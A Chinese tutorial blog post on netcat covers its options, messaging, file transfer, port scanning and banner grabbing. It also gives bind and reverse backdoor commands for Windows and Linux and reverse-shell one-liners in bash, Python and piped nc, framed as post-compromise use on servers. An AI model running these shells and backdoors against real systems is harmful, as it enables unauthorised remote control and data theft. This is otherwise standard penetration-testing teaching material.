网络瑞士军刀netcat

2024-03-09 17:30
文章标签 网络 瑞士军刀 netcat

本文主要是介绍网络瑞士军刀netcat,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

netcat是什么?

Netcat是一款非常出名的网络工具,有瑞士军刀之称。它虽然体积小,但是在网络中无比强大,它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。
在这里插入图片描述

如何下载

kali自带netcat,直接使用即可,windows下载
链接:https://pan.baidu.com/s/1MmAStRA2WCfQ5arR4HBsHQ
提取码:zjvj
下载压缩包后解压即可(32位和64位分清使用)

本次实验中windows的ip为192.168.1.218
kali的ip为192.168.65.132

nc的控制参数

参数简介
-l设置nc处于监状态,此时nc当做服务端,监听并等待连接
-L和-l相似,当客户端断开时,服务端回到等待状态
-p设置监听端口
-unc使用UDP协议,默认使用TCP协议
-w后面跟数字,超时断开
-z表示zero,扫描时不发送任何数据,加快扫描速度
-n设置nc只识别ip地址,不进行dns解析
-v输出交互或出错信息
-s指定发送数据的源ip,适用于多网卡机
-d脱离命令窗口,在后台运行(关闭终端,仍可运行)
-e执行某个程序
-i设置发送每行数据的时间间隔

可使用nc -h查看帮助信息:
在这里插入图片描述

基本使用

1、通信

服务端开启监听:nc -l -p localport
客户端连接: nc remoteip remoteport
此时两台机器可进行简单通信功能
在这里插入图片描述

2、文件传输

为什么可以直接利用nc进行文件传输?

nc中的数据传输,使用的是标准的输入、输出流,所以可以直接利用命令来进行操作。

文件传输的使用场景

1、取证:当目标机器被黑客攻击后,取证人员可以利用nc的文件传输功能来获取目标机器的文件内容,避免直接在目标机器上进行操作造成取证的误差。
2、单纯获取目标机敏感文件,当目标机上有的文件内容无法正常下载,可以使用nc进行文件的传输。

客户端发送文件给服务端

服务端:nc -l -p localport > acceptfile
客户端: nc remoteip remoteport < sendfile
在这里插入图片描述

服务端发送文件给客户端

服务端:nc -l -p localport < sendfile
客户端: nc remoteip remoteport > acceptfile
在这里插入图片描述

3、信息探测

信息探测的使用场景

1、目标内网的扫描
当获取目标权限之后,如果目标没有任何途径可以对内网进行探测,但此时有一个nc,就可以使用nc对内网的ip和端口进行扫描。
2、当手头没有探测工具时,可以使用nc进行端口探测
3、对目标的服务banner进行抓取,通过nc对目标端口进行探测。

端口扫描

nc -n -v -w1 -z target_ip start_target_port- stop_target_port
在这里插入图片描述

Banner抓取

echo " "| nc -v -n -w1 target_ip start_target_port- stop_target_port
在这里插入图片描述

4、建立后门

建立后门的使用场景

当目标机器上有nc时,可以使用nc来建立后门,实现执行目标命令的功能。

windows监听型后门

有客户端连接该端口时,返回cmd给客户端 nc -l -p port -e cmd.exe
出现乱码,输入chcp 65001 消除乱码
服务端: nc -l -p 9999 -e cmd.exe
客户端:nc64.exe 192.168.1.218 9999
此时客户端获取服务端cmd
在这里插入图片描述

windows连接型后门

连接的客户端返回给服务器cmd nc ip port -e cmd.exe
服务端: nc -l -p 9999
客户端:nc64.exe 192.168.65.132 9999 -e cmd.exe
此时客户端将cmd.exe发给服务端,服务端可以使用cmd命令
在这里插入图片描述

linux监听型后门

nc -l -p port -e /bin/bash
服务端: nc -l -p 9999 -e /bin/bash
客户端:nc64.exe 192.168.65.132 9999
在这里插入图片描述

linux连接型后门

nc ip port -e /bin/bash
服务端: nc64.exe -l -p 9999
客户端:nc 192.168.1.218 9999 -e /bin/bash
在这里插入图片描述

5、连接转发

在这里插入图片描述
现需要kali1和kali2互通,解决方法:
1、kali2开启监听: nc -l -p 9999
2、windows 开启监听: nc64.exe -l -p 9998 -e qwe.bat
其中qwe.bat的文件内容为: nc64.exe 192.168.65.132 9999
3、kali1连接windows,执行qwe.bat,再次连接kali2,此时kali1和kali2建立连接,可以发送请求。

6、反弹shell

bash

场景:拿到某服务器权限,想反弹shell,但服务器未安装nc。
反弹shell命令: bash -i >& /dev/tcp/ip/port 0>&1
接受命令: nc -lvp port
在这里插入图片描述

在这里插入图片描述

python

场景:拿到某服务器权限,想反弹shell。服务器未安装nc,但安装了python。

反弹shell命令:
import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
接受命令:  nc -lvp port

在这里插入图片描述

在这里插入图片描述

bash

场景:拿到某服务器权限,想反弹shell。服务器不支持-e参数。
反弹shell命令: nc ip port | /bin/bash | nc ip port
接受命令(开启两个监听端口): nc -lvp port1 nc -lvp port1
完成后在port1输入命令,port2执行并返回结果
演示图

这篇关于网络瑞士军刀netcat的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/791401

相关文章

Linux网络配置之网桥和虚拟网络的配置指南

《Linux网络配置之网桥和虚拟网络的配置指南》这篇文章主要为大家详细介绍了Linux中配置网桥和虚拟网络的相关方法,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 一、网桥的配置在linux系统中配置一个新的网桥主要涉及以下几个步骤:1.为yum仓库做准备,安装组件epel-re

python如何下载网络文件到本地指定文件夹

《python如何下载网络文件到本地指定文件夹》这篇文章主要为大家详细介绍了python如何实现下载网络文件到本地指定文件夹,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下...  在python中下载文件到本地指定文件夹可以通过以下步骤实现,使用requests库处理HTTP请求,并结合o

Linux高并发场景下的网络参数调优实战指南

《Linux高并发场景下的网络参数调优实战指南》在高并发网络服务场景中,Linux内核的默认网络参数往往无法满足需求,导致性能瓶颈、连接超时甚至服务崩溃,本文基于真实案例分析,从参数解读、问题诊断到优... 目录一、问题背景:当并发连接遇上性能瓶颈1.1 案例环境1.2 初始参数分析二、深度诊断:连接状态与

Qt实现网络数据解析的方法总结

《Qt实现网络数据解析的方法总结》在Qt中解析网络数据通常涉及接收原始字节流,并将其转换为有意义的应用层数据,这篇文章为大家介绍了详细步骤和示例,感兴趣的小伙伴可以了解下... 目录1. 网络数据接收2. 缓冲区管理(处理粘包/拆包)3. 常见数据格式解析3.1 jsON解析3.2 XML解析3.3 自定义

Linux系统配置NAT网络模式的详细步骤(附图文)

《Linux系统配置NAT网络模式的详细步骤(附图文)》本文详细指导如何在VMware环境下配置NAT网络模式,包括设置主机和虚拟机的IP地址、网关,以及针对Linux和Windows系统的具体步骤,... 目录一、配置NAT网络模式二、设置虚拟机交换机网关2.1 打开虚拟机2.2 管理员授权2.3 设置子

揭秘Python Socket网络编程的7种硬核用法

《揭秘PythonSocket网络编程的7种硬核用法》Socket不仅能做聊天室,还能干一大堆硬核操作,这篇文章就带大家看看Python网络编程的7种超实用玩法,感兴趣的小伙伴可以跟随小编一起... 目录1.端口扫描器:探测开放端口2.简易 HTTP 服务器:10 秒搭个网页3.局域网游戏:多人联机对战4.

SpringBoot使用OkHttp完成高效网络请求详解

《SpringBoot使用OkHttp完成高效网络请求详解》OkHttp是一个高效的HTTP客户端,支持同步和异步请求,且具备自动处理cookie、缓存和连接池等高级功能,下面我们来看看SpringB... 目录一、OkHttp 简介二、在 Spring Boot 中集成 OkHttp三、封装 OkHttp

Linux系统之主机网络配置方式

《Linux系统之主机网络配置方式》:本文主要介绍Linux系统之主机网络配置方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、查看主机的网络参数1、查看主机名2、查看IP地址3、查看网关4、查看DNS二、配置网卡1、修改网卡配置文件2、nmcli工具【通用

使用Python高效获取网络数据的操作指南

《使用Python高效获取网络数据的操作指南》网络爬虫是一种自动化程序,用于访问和提取网站上的数据,Python是进行网络爬虫开发的理想语言,拥有丰富的库和工具,使得编写和维护爬虫变得简单高效,本文将... 目录网络爬虫的基本概念常用库介绍安装库Requests和BeautifulSoup爬虫开发发送请求解

如何通过海康威视设备网络SDK进行Java二次开发摄像头车牌识别详解

《如何通过海康威视设备网络SDK进行Java二次开发摄像头车牌识别详解》:本文主要介绍如何通过海康威视设备网络SDK进行Java二次开发摄像头车牌识别的相关资料,描述了如何使用海康威视设备网络SD... 目录前言开发流程问题和解决方案dll库加载不到的问题老旧版本sdk不兼容的问题关键实现流程总结前言作为